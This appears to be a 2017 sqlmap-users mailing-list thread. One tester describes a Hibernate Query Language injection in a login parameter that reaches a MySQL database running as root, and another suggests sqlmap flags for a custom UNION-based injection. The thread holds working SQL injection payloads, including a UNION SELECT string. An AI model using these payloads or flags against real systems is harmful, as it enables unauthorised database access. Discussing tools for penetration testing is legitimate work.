I *think* (going from memory here) that it's higher than that by default.
There's also the --union-cols=30-40, so you should be good
On 24 February 2017 at 18:17, Robin Wood <robin@digi.ninja> wrote:
> I hadn't tried the custom injection point, I'll give that a try. Do you
> know the maximum number of fields the union will do, was thinking about it
> after shutting machine down and think it's 30 so will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <christopher.oak...@gmail.com>
> wrote:
>
>> I assume you've tried * for custom injection point and --technique=U?
>>
>> Whether or not it'll dance with HQL is another question entirely.
>>
>> On 24 February 2017 at 16:44, Robin Wood <robin@digi.ninja> wrote:
>>
>> I've just found an instance of Hibernate Query Language injection that
>> lets me get at an underlying MySQL database if I inject in the right way,
>> some examples I've got are:
>>
>> loginName=a - works and gives 200
>> loginName=' - fails with HQL error and 500
>> loginName=a' or 'a'='a - works and gives 200
>> loginName=a\'' - gets through HQL and then generates a MySQL error in a
>> where clause. The injection gets converted to where NAME='a\'''
>>
>> With some playing I've found that this is a valid injection and they are
>> running as root as I get a 500 back when I supply root, a 200 when give
>> something else.
>>
>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,
>> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
>> from users where user()="root@localhost" -- '='1
>>
>> The 500 is because some of the stuff from the union isn't being handled
>> correctly by the page, the 200 is because the union doesn't return any data
>> so the first bit (basically a=a) is returning valid data so getting through
>> the rest of the parsing.
>>
>> So I think what I need to do is to tell SQLMap that it is a union
>> injection with 31 fields and that the injection needs to go into here:
>>
>> loginName=a' and 'a\''="a" <INJECT> -- '='1
>>
>> Can I do this?
>>
>> I've got all this set up and running in Burp so I can test things out if
>> anyone needs me to.
>>
>> Robin
>>
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
